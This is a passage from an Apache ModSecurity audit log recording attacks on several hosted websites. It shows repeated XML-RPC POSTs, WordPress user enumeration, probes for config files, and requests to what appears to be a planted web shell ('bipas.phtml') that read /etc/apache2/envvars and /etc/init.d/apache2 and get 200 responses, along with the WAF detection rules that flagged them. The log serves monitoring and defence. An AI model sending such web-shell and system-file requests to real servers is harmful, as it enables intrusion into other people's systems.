"WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.3econcepts.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.3econcepts.com"] [uri "/wp-json/wp/v2/users"] [unique_id "aE7mPThI90Z2oKaiWo6rxQAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/3econcepts.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750001213341190 614163 (- - -) Stopwatch2: 1750001213341190 614163; combined=2050, p1=332, p2=1611, p3=0, p4=0, p5=106, sr=98, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --70583929-Z-- --cd445e7a-A-- [15/Jun/2025:20:57:50.178083 +0530] aE7mdfRzj1BwdxQoarvQLwAAAAo 128.199.112.101 42392 127.0.0.1 7081 --cd445e7a-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --cd445e7a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --cd445e7a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7mdfRzj1BwdxQoarvQLwAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750001269243049 935089 (- - -) Stopwatch2: 1750001269243049 935089; combined=2141, p1=367, p2=1346, p3=49, p4=72, p5=192, sr=110, sw=115, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cd445e7a-Z-- --ed978673-A-- [15/Jun/2025:20:58:50.430482 +0530] aE7msV0gAfK4E6yok-jYFAAAAA4 128.199.112.101 58968 127.0.0.1 7081 --ed978673-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --ed978673-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --ed978673-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7msV0gAfK4E6yok-jYFAAAAA4"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750001329465879 964658 (- - -) Stopwatch2: 1750001329465879 964658; combined=2069, p1=366, p2=1345, p3=34, p4=51, p5=177, sr=98, sw=96, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ed978673-Z-- --6ef85532-A-- [15/Jun/2025:20:59:50.020746 +0530] aE7m7TC7Dm45DAhop9gSHwAAAAY 128.199.112.101 48670 127.0.0.1 7081 --6ef85532-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --6ef85532-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --6ef85532-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7m7TC7Dm45DAhop9gSHwAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750001389094333 926469 (- - -) Stopwatch2: 1750001389094333 926469; combined=2757, p1=465, p2=1870, p3=46, p4=98, p5=175, sr=111, sw=103, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6ef85532-Z-- --fb405a3f-A-- [15/Jun/2025:21:00:47.651490 +0530] aE7nJ0D4emz4pcZ5aGTfmwAAAAE 50.16.248.61 46312 127.0.0.1 7081 --fb405a3f-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/apache2&viewfile=//etc/apache2/envvars HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 50.16.248.61 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --fb405a3f-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3813 Connection: close Content-Type: text/html; charset=UTF-8 --fb405a3f-H-- Message: Warning. Matched phrase "etc/apache2/envvars" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apache2/envvars found within ARGS:viewfile: /etc/apache2/envvars"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/apache2/envvars" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apache2/envvars found within ARGS:viewfile: /etc/apache2/envvars"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7nJ0D4emz4pcZ5aGTfmwAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1750001447646834 4721 (- - -) Stopwatch2: 1750001447646834 4721; combined=2581, p1=323, p2=2094, p3=49, p4=41, p5=74, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fb405a3f-Z-- --6b4e9a29-A-- [15/Jun/2025:21:00:50.979086 +0530] aE7nKvRzj1BwdxQoarvQswAAAAo 128.199.112.101 40402 127.0.0.1 7081 --6b4e9a29-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 493 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --6b4e9a29-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --6b4e9a29-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7nKvRzj1BwdxQoarvQswAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750001450057770 921370 (- - -) Stopwatch2: 1750001450057770 921370; combined=2160, p1=359, p2=1401, p3=41, p4=58, p5=188, sr=103, sw=113, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6b4e9a29-Z-- --6190c15f-A-- [15/Jun/2025:21:00:51.598189 +0530] aE7nK_yBV0BIpWmUvo8VAAAAAAc 23.23.214.190 40476 127.0.0.1 7081 --6190c15f-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/init.d&viewfile=//etc/init.d/apache2 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 23.23.214.190 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --6190c15f-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 5423 Connection: close Content-Type: text/html; charset=UTF-8 --6190c15f-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/apache2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7nK_yBV0BIpWmUvo8VAAAAAAc"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/apache2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7nK_yBV0BIpWmUvo8VAAAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1750001451594340 3899 (- - -) Stopwatch2: 1750001451594340 3899; combined=2071, p1=290, p2=1633, p3=35, p4=32, p5=81, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6190c15f-Z-- --9175ad42-A-- [15/Jun/2025:21:01:51.448936 +0530] aE7nZhLQPChAjmM6-0iujwAAAAQ 128.199.112.101 54656 127.0.0.1 7081 --9175ad42-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 500 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --9175ad42-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --9175ad42-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7nZhLQPChAjmM6-0iujwAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750001510519400 929609 (- - -) Stopwatch2: 1750001510519400 929609; combined=2109, p1=395, p2=1244, p3=72, p4=71, p5=210, sr=133, sw=117, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9175ad42-Z-- --1d52e433-A-- [15/Jun/2025:21:02:51.362997 +0530] aE7novRzj1BwdxQoarvQ9wAAAAo 128.199.112.101 35002 127.0.0.1 7081 --1d52e433-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --1d52e433-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --1d52e433-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7novRzj1BwdxQoarvQ9wAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750001570432717 930348 (- - -) Stopwatch2: 1750001570432717 930348; combined=2081, p1=364, p2=1301, p3=45, p4=59, p5=194, sr=107, sw=118, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1d52e433-Z-- --18011403-A-- [15/Jun/2025:21:03:51.898665 +0530] aE7n3gG_OhOIIVz6TXR4AAAAAAA 128.199.112.101 42188 127.0.0.1 7081 --18011403-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --18011403-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --18011403-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7n3gG_OhOIIVz6TXR4AAAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750001630920860 977881 (- - -) Stopwatch2: 1750001630920860 977881; combined=1972, p1=296, p2=1268, p3=43, p4=60, p5=192, sr=83, sw=113, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --18011403-Z-- --1aedf66d-A-- [15/Jun/2025:21:04:13.233488 +0530] aE7n9PRzj1BwdxQoarvRKwAAAAo 52.169.149.155 53470 127.0.0.1 7081 --1aedf66d-B-- GET /hitech-news.com HTTP/1.0 Host: www.bspsons.com X-Real-IP: 52.169.149.155 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: wordpress_test_cookie=WP%20Cookie%20check --1aedf66d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.bspsons.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --1aedf66d-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.bspsons.com|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.bspsons.com|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.bspsons.com"] [uri "/hitech-news.com"] [unique_id "aE7n9PRzj1BwdxQoarvRKwAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/bspsons.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750001652737023 496523 (- - -) Stopwatch2: 1750001652737023 496523; combined=1938, p1=294, p2=1551, p3=0, p4=0, p5=92, sr=87, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1aedf66d-Z-- --80fa2e4b-A-- [15/Jun/2025:21:04:51.466755 +0530] aE7oGhLQPChAjmM6-0ivLAAAAAQ 128.199.112.101 45310 127.0.0.1 7081 --80fa2e4b-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --80fa2e4b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --80fa2e4b-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7oGhLQPChAjmM6-0ivLAAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750001690565692 901130 (- - -) Stopwatch2: 1750001690565692 901130; combined=2105, p1=366, p2=1345, p3=44, p4=63, p5=177, sr=101, sw=110, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --80fa2e4b-Z-- --25fbe938-A-- [15/Jun/2025:21:05:51.033630 +0530] aE7oVvRzj1BwdxQoarvRlwAAAAo 128.199.112.101 37130 127.0.0.1 7081 --25fbe938-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 509 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --25fbe938-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --25fbe938-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7oVvRzj1BwdxQoarvRlwAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750001750051504 982183 (- - -) Stopwatch2: 1750001750051504 982183; combined=2334, p1=372, p2=1547, p3=44, p4=59, p5=191, sr=102, sw=121, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --25fbe938-Z-- --1037e41c-A-- [15/Jun/2025:21:06:32.930576 +0530] aE7ogE8lJjIMESHamzJEjwAAAAg 208.88.73.86 56772 127.0.0.1 7081 --1037e41c-B-- GET /mailer.ini HTTP/1.0 Host: padah.cstechns.com X-Real-IP: 208.88.73.86 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Accept-Encoding: gzip, br, deflate --1037e41c-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 04:35:16 GMT ETag: "328-62143b366eaa6" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --1037e41c-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||padah.cstechns.com|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||padah.cstechns.com|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "padah.cstechns.com"] [uri "/mailer.ini"] [unique_id "aE7ogE8lJjIMESHamzJEjwAAAAg"] Stopwatch: 1750001792927046 3608 (- - -) Stopwatch2: 1750001792927046 3608; combined=2094, p1=386, p2=1628, p3=0, p4=0, p5=80, sr=98, sw=0, l=0, 